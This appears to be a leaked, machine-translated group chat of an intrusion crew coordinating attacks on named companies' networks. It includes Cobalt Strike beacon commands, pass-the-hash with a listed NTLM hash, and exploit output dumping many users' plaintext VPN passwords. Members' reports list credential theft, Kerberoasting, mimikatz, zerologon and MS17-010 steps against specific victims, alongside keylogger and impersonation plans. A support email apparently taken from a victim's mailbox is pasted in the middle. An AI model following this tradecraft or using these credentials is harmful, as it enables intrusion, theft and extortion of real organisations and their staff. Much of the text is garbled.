Honestly speaking, I haven't tested it myself yet) Looks interesting, but what is "poc.exe", is it an exploit or just a toolkit, so that the file won't be deleted? I don't really get it. http://decoder.cloud/2020/10/24/when-ntuser-pol-leads-you-to-system/ but not in 2, we guessed) No new sessions today) hmmm, so let's keep working @tl2? And where do we have @user1 and @user3? It's ok)) and @tl2 just re-snap the accessible kerb) How to check it?
there are kerbs disconnected accounts yes you get the idea if the kerb LA on the server somewhere there may well be hash admin and so you can try to kerb that will unbroken check on the car from which was kerbdakerby just there?so what's the difference between admin/non-admin in this case, I'll look at the ticketsThey've deleted a lot of admins, and now the kerbs only on the absent.no kerbs (kerbs only faster @tl2 now I'll change it so it will be better you at least change your ava) it's ok, keep quiet for a minute and he'll see for himself) look who wrote it, never mind the point it does not matter he read and did not understand it and what? well, read it carefully and what did you throw it at me first?[ ](https://mediaeveryonecom/channel/general?msg=4EFEQi79LBrjifoBX) Yeah[ ](https://mediaeveryone.com/channel/general?msg=BhrQCGmk6EgJ9rrLj) 1kerbs will be the same no matter what car they were shot on? Not me)re-shoot and direct to @tl2Need to re-shootYes, the old ones went stale...there is an alternative solution for snpartners, there are yes - but the farm is not there yet (and we have no kerbs at all so the farm will be in 2 weeks anyway kerbs yes no kerbs are you kerbs filmed?we're trying to get the credits YES[ ](https://mediaeveryone.com/channel/general?msg=BDC8RKTmvoJ8CaP9h) :dog:[ ](https://mediaeveryone.com/channel/general?msg=v8ebbs3n7d6WSkYjs) ?as it turns out nothing) (also a joke, don't take it seriously) you know? and today you said "by ten" and then "by two" you said "by ten", and? it's clear, you just said the same) i didn't understand what i wrote ?[ ](https://mediaeveryone.com/channel/general?msg=w5zjzpnoK9RJLRAy5) by two ? ?I have deja vu[ ](https://mediaeveryone.com/channel/general?msg=nkgf4mWcASkFHjag6) it's on the oldbut there will be new ones closer to 10That just came in. Are the new ones coming? or can the chinese come back? while there are no new ones, what are the old ones doing now? 
on #stanthonyskc-com too, on #snpartners-com nothing new. How are the tasks going? :space_invader: hello. How is the progress on the others? The Chinese are not back, no new ones... What time do we wrap it up, at 6:00? What time tonight? Sessions is stuck. Thanks a lot and I've got it... if you use the parameter --public-only then it will show only those where the user is admin. By default 50, like the threads are turned up to max... but that's cool. Why is it so monstrously fast? No it's not, it'll show the shares and take the list from AD, just shares. I think ad is only used with ips?
```
execute-assembly SharpSharesNG.exe shares ad --alive --output file.txt
```
correct? ops)
```
execute-assembly SharpSharesNG.exe ips list servaki.txt --alive --output servaki-alive.txt
```
ping the hostlist )
```
 * SharpSharesNG --max-threads 10 --output console|/path/to/file
 *
 * ips - equiv ips ad
 * ips 10.0.0.1 [--os-detect] [--alive] [--exec] script\path
 * ips 10.0.0.1/24 [--os-detect] [--alive] [--exec] script\path
 * ips HostName [--os-detect] [--alive] [--exec] script\path
 * ips [ad] [--os-detect] [--alive] [--exec] script\path
 * ips [list] c:\users\hostlist.txt [--os-detect] [--alive] [--exec] script\path
 *
 *
 * shares - equiv shares ad
 * shares 10.0.0.1 [--os-detect] [--public-only]
 * shares 10.0.0.1/24 [--os-detect] [--public-only]
 * shares HostName [--os-detect] [--public-only]
 * shares [ad] [--os-detect] [--public-only]
 * shares [list] c:\users\hostlist.txt [--os-detect] [--public-only]
```
She's, secludes? Or just start it and it spits somewhere? Is there any argument? @all share please SharpShares. Set one and a half pk. @user8 with @user3 are preparing which of? Today we close one network. However not, there already all in water. How is it?
If not, collect a detailed report in the conf. Collecting nothing, tried three times - doesn't collect. The work tools panel what, not working? hm, all the same lost, trying. @tl1 reboot my dedic plz)))) So we've been poking around a month in zohocorp in a workgroup? And what is wg? Meanwhile study the methods of work through vpn in a workgroup. 20 min, then recurse. Are you now without a task? What did you read in the mail? Was it my version, offline backups? Understand how you recovered and what you missed?
```
beacon> shell nltest /dclist:waterway.com
[*] Tasked beacon to run: nltest /dclist:waterway.com
[+] host called home, sent: 58 bytes
[+] received output:
Cannot find DC to get DC list from.Status = 1355 0x54b ERROR_NO_SUCH_DOMAIN
The command completed successfully
```
```
beacon> shell nltest /dclist:
[*] Tasked beacon to run: nltest /dclist:
[+] host called home, sent: 46 bytes
[+] received output:
Cannot find DC to get DC list from.Status = 1355 0x54b ERROR_NO_SUCH_DOMAIN
The command completed successfully
```
You threw the output with fqdn and that's what I threw the output from. Try to get the DC list from the list /dclist: shell nltest /dclist: yeah, fuck it
```
Cannot find DC to get DC list from.Status = 1355 0x54b ERROR_NO_SUCH_DOMAIN
The command completed successfully
```
Just came in. Check, is there domain authorization there? hello. 2 sessions in the water left? everyone hi. In the near future waiting for the farm for the kerbs) No info yet, or for php on Windows) Anyone searched for exploits for oracle? I would generally make an emphasis on services that are used in the networks, in addition to those that have passed lpe, and can look for modules. So if we do not have time on weekdays, we will have busy weekends. We need to close at least 3 networks completely in the week. The new sessions will come on Mon. Sleep and rest, next week will be difficult, right? I hope it's Saturday-Saturday = weekend :thumbsup: let's go home. Yes. @tl1 supported. rubbit really fall asleep at the keyboard, go home already?
for domain accounts can not be so passes may be different (i think so)he is listed as yes but he and LAa is not he so``? Result: Not Found, it is being cracked by our background system. Please wait up to 5 days. A notification email will be sent to you when it is cracked successful , otherwise it is cracked failure. ``Checked@user7`STAKC.local\sysadmin ff928c9f7bce0d834658c1436381494e``[ ](https://mediaeveryone.com/channel/general?msg=yBPXxCfaa9nF87Rzh) in which grid? Objects gettrunda here are the usersa have you checked by user group? almost 2120659 Objects gettrunda and not 30a on the second network (mine) only 20+ pk in #snpartners-coma we have 30k pk in the network yes?well there on some machines lA are domain users more, lA only hashclir lA? oops, channellly only those i wrote in the group did not find? those hashes as i understood not valid and lA we do not have?and only he alone on the key machines, and the other machines he goes through the local admin only 1 LA without a crate can not go anywhere, got all the possible from those cars on which the ducked the second network?here yes it's been a week since he announced to one MAu not pull servers in coba before closing@user4 coba in ls@user3 to @user8 byeHello all goodnight:space_invader:hello today until how many?YES there is nowhere? and the spns themselves, too, it seems like something you can chek. Yesterday I read something about it yes, there is a skul server, in powerupsql it says that you need to specify [machine]/instanseName...talk about spns? There is a thought to poke the skul, but do not know how to learn the name of the instance of the subject? or to test from the msfa there is a point to look for additional modules all patched not on the attack and the scan YES did not take? The day before yesterday changed passwords, deleted unnecessary YES. Nashuemel maybe why spalili? 
groups can write through #stanthonyskc-com more `stanthonyskc.com`STAKC in the works, but there we are probably spalilištom in the workspanki hoihiPrivetest who?All hellobbsb tomorrow to 12+retif.com confbukkmary in webmorda no one2auth+pozhaylustamen add to it until only adinfu managed to throw out quickly from there is where yes`grantweber.com` I checked everyone in the first one, no one has any bookmarks. in the second without 2fa, go through the client, almost immediately throws out, butch more men seem to move? [+] Checking URL https://172.81.67.174 [+] Found old SMA version (<9.x) [+] Appliance running version 9.0.0.2-13sv [+] Leaking sessions to dump configuration. [+] Attempting to dump sessions from https://172.81.67.174 [+] Found: SessionID: 0nwEo7juJp9uceT0bhNC2hMM7VuvDFIjyC5LyKjx6fQ= userType: 1 userName: dscully Password: Scully2@ Domain: retif [+] Found: SessionID: 3mzEGy480eoTW0PVGB4WkTx1pBcNckgNRvimSDRWboM= userType: 1 userName: acatalanotto Password: vera1010 Domain: retif [+] Found: SessionID: 6nkViGzUAfwhcy9EQTC4B1cnAJKVmuLVBoJQnaDHKKI= userType: 1 userName: rblanchard Password: abcd@1234 Domain: retif [+] Found: SessionID: 7180aU0jSdpraYLUADh6OpRYJJZekIHXoo2xT8XjI1tM= userType: 1 userName: anguyen Password: Car47029 Domain: retif [+] Found: SessionID: ClOqhz81D1QDthdUyzSnIFF3f9qpwBDnv6lJAueAMI= userType: 1 userName: dstoutin Password: C@ryH@milton Domain: retif [+] Found: SessionID: IMGyFJ3dmPSncBddBfqJzy5C9W0heL1wY02V35a3Ei8= userType: 1 userName: dblanchard Password: Tujaques2 Domain: retif [+] Found: SessionID: NrRgAAQeaCc1nMajX8HGk4ySOyKy89nDEs5Dbfm7JAtA= userType: 1 userName: mcooper Password: !Crystal2 Domain: retif [+] Found: SessionID: W1ed6V04FqvC8gm29587VfRoeqi7xvSIltpz1O6txrw= userType: 1 userName: lotrocki Password: Lisa0759 Domain: retif [+] Found: SessionID: WMhTxZjMPY1fIXps0WPYYA2kgbnnKD1fQxQm5tbuEoI= userType: 1 userName: jdufrene Password: Memphis3 Domain: retif [+] Found: SessionID: ZuQ9mTRTfwnBvo01zvkWjbiEpg08U9ZZtdH7rXiISAg= 
and there's also one more crack in the works right now.
till 12 plus minus? all 3 in the shit?
they're already pretty used by TV, but okay))
yeah, right)))
there are three more from Friday like you at 0?
do you have coba? take it?
@tl1 how long before tonight?
@user4 says it fell off
png
cpower with nothing to work with, so you have nothing to work with? or TV with?
new sessions will be
@tl1iandreevsnikitenkostalinottl2tl1admin good night
See you tomorrow = )
Adios, everyone, see you tomorrow
http://vk.com/@thntofff-ataki-na-active-directory-razbiraem-aktualnye-metody-povhshe
all gone
hii
Good morning
May someone open the door?
Good night, everyone)
I wrote that no
@tl1 New grids will be today?
not everywhere there is a note
keylogging? they're not itching at all ... well, I see)
waiting for entry + alerts
not alerts more than 30 minutes
how long will wait for alerts?
at threetut, I checked the mail as if one @user8 all does everything look at the files there @all where are we? so they certainly changed passes) yeah at first the exh was not available, but the problem was in the proc)) i checked 4 admins - no passwords? no, i can't get info on rtp in the mail? ready at 17:30 thank you + keylog is ready, anyone have a blauer? all have a keylog working at yours? i except blauer have 1, 3 know exactly what i have, do we all have sessions? displayName: Dianne Jarden >displayName: Brandon Lauer >displayName: Greg Keller >displayName: Mark Harper >displayName: Mike Pusatera Or at 5:00 in the morning? What are they writing there 2 people at #1-done-rtpcompany-com read the post at 4:30 ready at 5 work with water at 5 that's it, it didn't want to go in, it only went in at 10.

The following snapshots listed under volumes or snapshot collections listed under volume collections are not considered *unmanaged* by the Case Automation rules because they are managed by a different process than a retention policy:
a) Triggered by user action; these are considered *manual* snapshots
b) Triggered by third party software, the REST API, or a script; these are considered *externally triggered* snapshots
c) Triggered by HPE Nimble Storage Array due to a user action, such as volume restore, resize, promote, demote; these are considered *manual* snapshots
d) Triggered by an agent (such as VMware VVOL); these are considered *externally triggered* snapshots
e) Triggered by *handover* action; these snapshots are considered *manual* snapshots but currently managed by the retention schedule and require no user action

In situations where the condition above is not resolved, the Case Automation will open another case after the time period defined as "Sleep Time". The default "Sleep Time" for the Unmanaged Snapshot(s) Case Automation is 12 days, but may be changed if so desired.
If the Array Group was updated to NimbleOS 5.1.x for over 90 days and unmanaged snapshots are over 90 days old, those snapshots will no longer trigger Case Automation, to avoid repeat notification.

If you wish to no longer have cases opened nor receive case notifications for this alert type, you may disable this alert from generating cases completely for your array as follows: log in to the HPE InfoSight Web Portal at http://infosight.hpe.com/ and, under the Wellness tab:
* Click the "Configure Wellness Rules" button
* To disable case creation and notification for all arrays, uncheck the "Create Issue?" checkbox next to the rule named "Condition Name".
* To disable case creation and notification for a specific array:
  * Expand the "Condition Name" rule by selecting the "+" sign next to the rule name
  * Uncheck the "Create Issue?" checkbox next to a specific serial number.

NOTE: After the automatic case generation has been disabled (removed) for a certain condition, there will not be any more automatic cases created until the case generation is re-enabled manually.

If you have additional questions or require assistance, please reply to this email and an HPE Nimble Storage Support engineer will reach out to you. If you choose to contact HPE Nimble Storage Support by phone regarding this issue, please be sure to provide the case number in order to facilitate a rapid resolution. Telephone and Email Support is available 24x7. Contact details for your location can be found at the following web page: https://www.hpe.com/us/en/services/nimble-storage.html

For your convenience, the following is the U.S. support contact information:
Toll-free: 1-877-3NIMBLE (877-364-6253), extension 2
Local: 408-432-9600, extension 2
Email: support@nimblestorage.com
For other international support phone numbers, scroll down to the HPE Nimble Support section and expand the "Technical Support Phone Numbers" on the webpage: https://www.hpe.com/us/en/services/nimble-storage.html

***********************************************************************************
CASE REFERENCE NUMBER REQUIRED - DO NOT MODIFY ref:_00D80aba6._5002H1HQkfz:ref
***********************************************************************************

NOTE: This is an automated alert sent from Salesforce.com. This email message is for the sole use of the intended recipient(s) and contains confidential and privileged information. Any unauthorized review, use, disclosure or distribution is prohibited. Alert ID: https://nimblestorage.my.salesforce.com/00X80000001v7Fw

CONFIDENTIALITY NOTICE: The materials enclosed with this email transmission are private and confidential. The information contained in the material is privileged and is intended only for the use of the individual(s) or entity(ies) named above. If you are not the intended recipient, be advised that unauthorized use, disclosure, copying, distribution or the taking of any action in reliance on the contents of this emailed information is strictly prohibited. If you have received this email transmission in error, please notify the sender immediately by return email, delete this communication and destroy all copies. "Thank you".

* Nimble OS $ snap --list --all --unmanaged
### cut for brevity ###
* v1 vc1-vc1s1-2019-04-29::17:56:00.000 10 No Okay unknown default:/ N/A
* v2 vc1-vc1s1-2019-04-29::17:56:00.000 10 No Okay unknown default:/ N/A

b) Choose an appropriate value for the expiration of the unmanaged snapshots and check which snapshots have already expired, which ones will expire, and when.
NOTE: A negative value shows when snapshots would have already expired; a positive value shows in what amount of time the snapshots will expire, based on the value and units checked.
* Nimble OS $ group --autoclean_unmanaged_snapshots check --snap_ttl --snap_ttl_unit
Example:
* Nimble OS $ group --autoclean_unmanaged_snapshots check --snap_ttl 24 --snap_ttl_unit hours
### cut for brevity ###
* v1 vc1-vc1s1-2019-04-29::17:56:00.000 default:/ +23.96 hours
* v2 vc1-vc1s1-2019-04-29::17:56:00.000 default:/ +23.96 hours

c) Select snapshots which you prefer to keep for longer than the rest of the unmanaged snapshots and edit the TTL value directly. This can be done on the snap and snapcoll levels.
* Nimble OS $ snap --edit --vol --ttl --ttl_unit
Example:
* Nimble OS $ snap --edit vc1-vc1s1-2019-04-29::17:56:00.000 --vol v1 --ttl 60 --ttl_unit days

d) Change TTL to the enabled state and choose appropriate units and value of units.
NOTE: It is recommended to select an expiry unit value higher than any other currently present schedule in order to ensure snapshots have enough retention as required.
* Nimble OS $ group --autoclean_unmanaged_snapshots yes --snap_ttl --snap_ttl_unit
Example:
* Nimble OS $ group --autoclean_unmanaged_snapshots on --snap_ttl 30 --snap_ttl_unit days
* INFO: Snapshot Time-to-live is set to 30 days.

e) Verify the list of unmanaged snapshots has had its expiry time updated as desired:
* Nimble OS $ snap --list --unmanaged --all
### cut for brevity ###
* v1 vc1-vc1s1-2019-04-29::17:56:00.000 10 No Okay unknown default:/ +8.57 weeks
* v2 vc1-vc1s1-2019-04-29::17:56:00.000 10 No Okay unknown default:/ +4.29 weeks

A new case #04124985 has been created for you with Nimble Storage. Information about the case is listed below.
Account Name: Waterway Gas & Wash Company
Array SN: AF-180176
Array Name: ww-nimble-01
Nimble Group Name:
Case Number: 04124985
Case Priority: P3
Case Category: Snapshots
Case Origin: Autosupport
Case Owner: Support Queue - General
Case Subject: Unmanaged snapshot(s) have been detected due to configuration change
Case Description:
PLEASE NOTE: This is an automatically closed case; if the condition is expected, no reply is required.

Additional information regarding the issue described below is available to you in the form of an HPE InfoSight Knowledge Base (KB) article. Articles are hosted from the HPE InfoSight portal. The link provided will allow direct access for only seven (7) days without requiring that you log in to the InfoSight Portal. Please click on the title link to open or download the article: https://infosight.hpe.com/InfoSight/dispatch?token=eyJhbGciOiJIUzI1NiJ9.eyJ0b2tlbi10eXBlIjoiZG9jdW1lbnRhdGlvbi5rYkFydGljbGUucmVhZCIsImV4cCI6MTYxMDk4OTMyNCwic3ViIjoiQUYtMTgwMTc2IiwiaWF0IjoxNjEwMzg0NTI0LCJrYi1pZCI6IjAwMDA5NiIsImF1ZCI6IlBvcnRhbCIsImlzcyI6IlBhY2hpbmtvIn0.NYZ3RLJ4tRJssRAnJp-nrFQ-GgPkySPqCSsHQ-X5nM4

HPE Nimble Storage Case Automation has detected unmanaged snapshot(s) on your array. The snapshot(s) became *unmanaged* due to a configuration change of the volume collection, schedule, or volume association to a volume collection. In certain situations, snapshot(s) on the downstream replication partner could become unmanaged due to a name change of the volume collection or a schedule on the upstream replication partner. Because the affected snapshot(s) are no longer managed by a schedule, they will remain on the array indefinitely unless the Time-To-Live (TTL) feature is enabled or until they have been removed/deleted manually. As changes accumulate in the parent volume, the snapshot(s) will consume increasing amounts of space.
There are a few considerations regarding the deletion of unmanaged snapshots; please ensure you review the KB article attached to this case for more details. To avoid these cases in the future, you may enable the Time-To-Live (TTL) feature, which is available as of NimbleOS 5.1.x. The feature will automatically expire the snapshots which are considered unmanaged, based on the set period of time. TTL is enabled manually by the user via CLI only. Following are the recommended steps to enable the feature:
a) List current snapshots which are unmanaged; note that current expiry is set to "N/A", such as in the example:

Davaiem... let's better copypaste fullscreen messages from nimblahhhhhhahh helpdesk so they collect some from neighboring pc or predict user input))))120 percent is it so they generate 20 percent garbage in the output?)))we only have 1 chance to make keyloggers work at 120 percent where will flash ctrl look where will copy from if there? ``` [ctrl][v] [ctrl][v] ``ok, now I get the idea that it's realistic once could bemight think that boganulot to alert about logging in all you have to log in 1 in 1 you catch the pass in the keylogger will make them log in no, they will do it differently, write on behalf of nimbla) well I mean, that will pass social engineering if they start spamming each other about nimbla? they forward it so it was written a week ago imsvezhaya that fresh but it does not differ from those old that they sent earlier and repeat they forward it to each other but the date is fresh? jan 11 2021 who is the author? now send a screenshot letter to my modest calculations 3 and many times they forwarded the last letter between them (also was long ago) nothing more?
a million is how much in our?there was only correspondence with the supplier, but that was a million years ago blah blah blah is for 192.168.0.75 read more carefully i have seenwhen they communicate so did not meet some trust nibl external contactsgkeller there someone explained to someone for nibl as i remember nibl support tell me who they correspond with regarding niblack files and backups in ortpa no, there are several sessions in slip + build and so on prepare for this time sokda hang a hundred years in 4 start vodokaylogger spread?no already, no rts check live sessions quickly hello, user 3 is late where we have @user3 ? hello:space_invader:hii all in place? hello everyone good day)hii sleep well everyone, sessions in the slip, files erased good night good love is more expensive than money)apparently:D braggingbamba why is it here?)and morefiles were lost? in the slip have thrown sessions? good night good night then this + - to 4-5 nights and until the end until we close two networks tomorrow by 16:00 so we shift to 4 day tomorrow night close if tomorrow morning will not work tomorrow to 11 already be in place in the morning close the grid to 10 todaydavay then today will close it..571 koba you have on the team is the second koba do not even need less than 100 servers, although the grid is not big and if the armies to mount the servers will do with what is there I think just take your colleagues tomorrow planned another 4 in total if you have everything ready we can today will also close tomorrow? no, with the last koba problem is likely to replace tomorrow koba today wait?if there is a problem, then feedback here or if in lsv case you have doubts you can check in your conditions (on the deck) i had the day before yesterday, i think, assembled - it works. and @user9 today i did it, it does not work. hehehehehe nevertheless i had a feeling that he would be fine if he got a little frustrated. really now armas in the network just nothing. 
yesterday there were more@user4 on the classic zamakte to the servers? looking for access to the trusts, trying to pull the network to kobu nas, check the options, how to interact with armasak write me here 1 person from the team 1 message what are we doing now on your networks mepereperemple) @user9 you had 4.2 give out all please+@user7 give out to colleagues? or you stupidly will not let the client take only a new one wait all day come on quickly1 delayed there are 2 koby newokk @user8 thenokmno carenado help @user8 and @user4 who wants where? @user7 @user9 while the current postponed did not create anything removed[ ](https://mediaeveryone.com/channel/general?msg=p3HK9CSDutpKMds27) and I did not create you anything removed?I don't have a conf) or do you mean #lrhc-org ?@user7 @user9 write me a report in confu I'm digging SNU.EDUgospersportnu I have devry.edu, but I've been digging there for a week and am almost at a dead end, so who has what tasks at the moment?:man_raising_hand:hello to you all good morning:space_invader:thanks to you all, see you tomorrowGood morning:space_invader:good morning @echo off for /f %%i in (hosts.txt) do ( tasklist /s %%i /v >> .\ps.txt ) ``webrootanywhere``wsndomain.com - do not touch ``itc-us.com`` - work with her by kerbals by the way? if you use zerologon successfully there will be a chance to drink in the next day i think, so if you do it till the end today you can do it via @otam where you will take today yes you can do it till the end do it carefully can not promise anything nEveryone can kill the net with the tool above, it can!before you go into groups, write down what's at what stage and don't kill the networkdid not kill the tool:fingers_crossed:where there are deadlockstrendmicro.com/en_us/what-is/zerologon.html before 12 today, on weekends do not workmonitor the input coba for new sessions write to the groups that are active now and the status of itc-us.com in workIf there are new throw, work what about sessions? 
I have them off4 and 7helloWhere are the rest of you? everyone Hello have you added? `itc-us-com ` name of the confab where to add itc-us-com what is it?ITC.LOCAL it turns out so#itc-us-com ?ITCMA and no yes there is a system with user7 help user1 now i will add you to the team of free users write in groups where systems but no yes tomorrow will be clear or without all this weekend without me.and since you did not sleep tomorrow i will divide the day on "today - sleep - tomorrow" and not today then why tomorrow is tomorrow = today? tomorrow will be clear is still conditional info!!!!!!!!!!!!!!!!!!!!!!!!tomorrow=todaytomorrow=today by 3today by 7todaywrite your statuses in the active groups. any progress? to minimize pvshh i built a huge c# tulkit specifically for you, but it is not stacked with amsy and does not watch as pvshocheen please stop using verashell as much as possible where you can do with dotnet, yes.... i meant SharpView, not PowerView so stop what invoke? I've already written about both vpc and vpshshehe we'll find the logs from Misha, we started with him today it seems to output all in a row,just invoke-uchuchuchtuchtuchtuchtuchtuchtuchtucht if the user is not set, then it looks like something searches forhis error kicks out how so? sharpview does not seek? not seek (sharpview know how to find the users too? super! Yes, you have a Sharpe sniper?hence it should "be able" to read them because it accesses domain controllers logsand you have to run it only from domain admin contexttry sharpsniperit's a good time to test it)we were looking for something like this, i think we found it on veraschel, search for keywords like network, admin, tech, etc. and allocate them from ad_users and use this tool to find their pc where will be valuable information about the network, just the same should be information about edr, backups, etc. 
in the problem "search for technicians "actually helps find nts assigned to users, gave you this stuff?``` https://github.com/HunnicCyber/SharpSniper this is how you check if the current credentials are rolling on the remote pkvs make yourself a token lA for the supposed machine second - respectively from kmd through >shell@tl2 prompted you)or wmic /node:10.225.10.200 process briefs \\10.225.10.200\c$test the easiest way to check access to the file system1) will not be better - because similarly dirty load will be generatedGood friends, please. We now and in the future will be very often confronted with WPNs. I remember them as a whole + - by heart on the config and everything else, but in order to make it more convenient for everyone - please make a separate thread on the forum, where will lie installers VPN, guidance on finding config files vpnov on different operating systems, and other related to this type of access to the same ``` jump psexec64 10.225.10.200 https ``` pre-generates a dirty binary that could trick even a regular winndef, such attempts are almost guaranteed to create a securiti event-how to check here?) I think you already know what to check this way: ``` jump psexec64 10.225.10.200 https ``` wrong, because this token might not get access at runtime by itself, use primitive tokens, which only fail if access is wrong, or use make_token ```. pth datacenter.local\adm.brodan0 06290576382001cd1da4c942e9fa0ca6 ``I'll repeat the last time[ ](https://mediaeveryone.com/channel/general?msg=yHwrHWhtKpBocnuAK) let's get the passwords out of the vannott and move on to the eighth[ ](https://mediaeveryone.com/channel/general?msg=K4jfy6RjSGBrCRC2E) 2[ ](https://mediaeveryone.com/channel/general?msg=vgKtrJmq4LPeLYNQh) 1 or where is it from? they also have YES?) typo ninth) chetu.comdom.helpathome.com + found the "silent" servers? 
dom.helpathome.com - @user9 and @user1 saiglobal.com - @user8 @user4 finish his (check.on.com), then joins saiglobal.comfiredi.com@user8 domain? he'll do it@tl1 passni saig @user8 then me and @user1 finish mywas 6 people - 3 grids) he's a priority too and finish them both to myself in dom.helpathome.com)[ ](https://mediaeveryone.com/channel/general?msg=cMScshjiqrspPvE3W) but @user8 says no sessions to him, which one of you is lying? it's for the future, when you make a listener for a pass you specify it + 443 port there domain saw beacons at https?):wink:where does it go where?When you do `spawn misha`pass - pass it on the domain? by the way + and notice that there and the ip is different and not the one you connect to the right do you see? open and look at your https nobody even looked at their listener in the coba) you asked the coba where the sessions passwhat domain?[ ](https://mediaeveryone.com/channel/general?msg=iPcyxH5o42hFED4T2) that's the coba's ip, and I need a domain, different domains see different trusts from 19 still enough of the colleagues above) there are two of them, right? what trusts are there?.161.126.162 gotovkobu where to pass the session or work with those that remained from there need to do, the other trusts + hell + av + backups then allocate 1 person on saiglobal.com all at the dekat all without a case now? dekat rebooted00 write plz how many trusts in domains domains.helpathome.comhappay.inn so please tell me what grids are up now?[ ](https://mediaeveryone.com/channel/general?msg=HrfgL9vcyE6NR2MMX) .[ ](https://mediaeveryone.com/channel/general?msg=kZc6hgGxJF65QRDgg) .@user8 where are you going? yes-all the groups? sec)+@tl1Add me to them here tooharrau.add me to the confines of Stalinymm, and 1 that did not come upok) there's not so simple3 in the process until you can the first 2 to fall to the others, the third is still waiting? 
still a session came up) or have not yet connected) but I think the domain disconnected (yes, I work with her now - my yesterday red do not touch it + 1 + that Dc-01 and this session is one grid?strange thingd1 came) yesterday's sessions or yesterday's? either pass each other in the cob sessions or give access to a partner, there as conveniently as possible take one for two are expected 3 pcsIn both eyes:flushed:okomonitor yesterday's cobFriver.local two sessions - very hovering-sessions alive any?so good:sleeping:good morning)Good afternoon:space_invader:Cheerful morning)Quiet b\quiet night thank you all for todayThe important thing is that the mistakes are passed and the results are thereGood for you and took two DADos to tomorrowcorrects and dedicamacos)until tomorrowtodaytodaytodaytoday it's a long time let's finishtakahe good option to look for sploits and check for lpe we have services in the network, we check them in the case in situations to sort out theoretical up to search for the name of the dog admin as a password) well, and if it did not pass?)) poured in the archive, which was in the requirements for the reportitsituation is theoretical)ftp sploitvoprosy almost all of us today do not have polzaki la no credits (nowhere at all) go up does not work logically need to scan the network, look for 7/xp/sql and so on - and sploat them let's say the kerb is still unhackable keyloggers, fakelogons.... Inway I might have missed something, but that's pretty much it. what else interesting things can be done in such a situation? so, all poured files with hell and other things? yes, i checked on 4 phones at home - does not work on any of them tomorrow by 15 who do not know vpinp.net ``` User is not LA creeds from browsers AD info Checked the non-ABA test domain Got the LA\DA\EA lists sitifno ran the dll Checked files on the machine that contain passwords. Checked ad_computers for passwords. 
trying to raise permissions (2020-076)
mimikatz value::creds
session crashed
```
We've got a cart that's not working.

helpathome.com
```
The user is not LA
browsers creds
AD info
Checked the non-AB\test domain
Got the LA\DA\EA lists
sitifno ran the dll
Checked files on the machine that contain passwords.
Checked ad_computers for passwords.
trying to raise permissions (2020-076)
Share-Finder (process died)
GPPP-Pass
Invoke_Kerberoast
mimikatz value::creds
Ping machines in the domain
Portscan to standard ports
session crashed
session is back
kerb hash reset - started to check for validity
checked user - yes, password has not changed for a long time
tried to check validity via net use - got syntax error
session crashed
```
@user7 didn't you get a session?
collected information from the machine: adinf, sylbelt, sharpweb, rubeus kerb, invok kerb, tried no gpp (found nothing), ran through the folders. went from ad computers to windows 2003 and HP. pinged them and made a list. Alexei connected and on one of the win 2003 machines he brought up the system with the DA credentials, filled in the dll and started it up. took hashes from the dc, started to complete the list of servers, decided to make life easier: leha script and fakal doc over which sat all this time as got hell info
groups were, the current user does not enter them
anyone had such a situation with LA as I described? that there is no direct reference to the current user, but there are other groups?
Received session:
UserName: forstern (not a local admin)
HostName: SHO-LT-4726W10
Domain: bnpmedia.com
Got it:
AdFind
DCs DA EA LA (SHO-LT-4726W10)
SeatBelt
WinPeas
Kerb-hash (Rubeus)
1 password from browser (SharpWeb) by MSOutLook
It didn't work:
CVE-2020-0796 - session in system context did not spawn, no error
Net-GPPPasswords.exe - it parried, it did not give me any creds
Invoke-Kerberoast.ps1 - gave an error that there were no users for kerberoast
smb_login - ran MSOutLook password on the current subnet, no machine came up
SharpChrome - didn't give out any creds
Did not have time:
MS_17_010 - Built OS: Windows XP, 7, Server 2003, 2008, had time to ping not all, planned to run ms_17_010_psexec on successfully pinged.
Also sorted the servers into groups. OpenVPN and ScreenConnector configurations were found on the computer. OpenVPN could not be deployed on the harddisk.
```
*CHETU.COM
unchecked
AD info removed
net accounts /dom
net group "domain admins" /dom
net group "enterprise admins" /dom
stripped the invoke-kerberos and gave them to the brute force
SeatBelt + winPEAS
SharpChrome - pulled out 10 passwords that fit the length of the domain requirements.
Raising the privileges did not work, in spite of the not updated Windows
From ad_computers I checked out the server computers and added pings to the list.
Found a backup file OneNote passwords.one (On 8-27-2020).one on the system.
Prepared a list of interesting files on the FS (unattend and office docs)
```
just the first line in the message with the "report" name conf confi to know where there is a situation write more immediately on what grid pliz
harrau.in
```
1) Take off the browser creds: Chrome and then all the rest
2) Take off AD_Users
3) take off DA
4) removed local
5) Remove mimic
6) Collected password files
7) Halfway through the system
8) Started looking at the network for further movement
9) Sorting data
10) Preparing reports
The connection is lost.
```
friver.local
```
Helping User7
1) Checked subnets
2) Chose a subnet, checked on ms17, found one machine, threw the session into armitage
3) Took down hashdump and mimic.
4) Found DA.
5) Got a dump from DS.
```
exchange of experience, peculiar) suddenly someone will have good thoughts on the problems of another let everyone understand the situation on the grids write directly here where to write? For each of your grids write overall score for today, what's up, what's done, what worked, what did not work, questions, let's probably summarize the results today hodu too long search, missed the opportunity to that another kobu try to `s? AHyHax beacon> spawn https ``Are there any uses? shell adfind.exe -b dc=standards,dc=com,dc=au -f "(objectcategory=organizationalUnit)" > C:\Programdata\standards_ad_ous.txt shell nltest /dclist:c360losal is @user1 @user3 catch it should be careful because it is quite strong floods I'll tell you this, 3 times in a row run, admins will burn the network load and throw everyone) server and user OS he checks the balls on each pc in the domain I was more about the algorithm itself `` `` performs two functions at once, if we start it from a user context and see immediately available ADMIN$ balloons - it means we are local admin there and can already move there if there are no such machines in the network - at least we get a list of available balls for reading, which may contain information relevant to upgrade privileges You understand how sharefinder works, don't you? and it's server subnets at this scale are better to scan /24. So you need 20 domains, take off the ad_computer, ping the servers and connect the port?
no, in 1 domain) in each domain?of the pluses, there is already YES, from the minuses there are still 19 trusts, I'll tell you when I runWe have automatic spoiling on such fruitovorov they pass you and see that you on 10 sessions in the cobs did not fructify, I pass @user1 @user3 sessions on the casexDseek ways to the cloud, look for the cradleshttp://arhangel.ru/fortune/online/taro/maps will prompt the right wayalgorithm is clear, but if the AV will be cloud and his server is not in the network?)hell certainly do not need to remove, but you can)well algorithm is clear, go fix the same, but is it enough for you?)portscans sorting all that's what we do on saturday,so what did we do,let's move on to the networK practice.Good morning,good morningGood morningGood morning to all:space_invader: All good morningon the forum access is closeddrop user1 everywhere + change passes in the shared resources, the coba it will be closed for 2 hoursI thought I was on the wrong forum go)) oops fucked up,already up) and what domain?it is lying)why? yes, so good that they themselves now do not get on the forum)@user1 on the forum and everywhere else is closed? There may be fewer detects than on the current active, or additional functionalityI have 